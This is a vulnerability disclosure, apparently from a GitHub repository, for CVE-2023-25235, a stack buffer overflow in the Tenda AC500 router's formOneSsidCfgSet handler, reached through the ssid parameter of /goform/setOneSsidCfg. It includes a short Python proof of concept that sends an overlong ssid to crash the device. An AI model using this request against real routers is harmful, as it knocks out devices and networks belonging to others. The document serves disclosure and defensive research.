Headline
CVE-2023-25235: Vluninfo_Repo/CNVDs/113_2 at main · Funcy33/Vluninfo_Repo
Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function formOneSsidCfgSet via parameter ssid.
Tenda Router AC500 Vulnerability
This vulnerability lies in the /goform/setOneSsidCfg page which influences the lastest version of Tenda Router AC500. (The latest version is AC500_V2.0.1.9(1307))
Vulnerability Description
There is a stack-based buffer overflow vulnerability in function formOneSsidCfgSet.
In function formOneSsidCfgSet it reads user provided parameter ssid into src, and this variable is passed into function strcpywithout any length check, which may overflow the stack-based buffers`.
So by requesting the page /goform/setOneSsidCfg, the attacker can easily perform a Deny of Service Attack.
POC
import requests
IP = "10.10.10.1"
url = f"http://{IP}/goform/setOneSsidCfg?"
url += "ssid=" + "s" * 100
response = requests.get(url)
Timeline****Acknowledgment
Credit to @Funcy_kilar from Guangzhou University.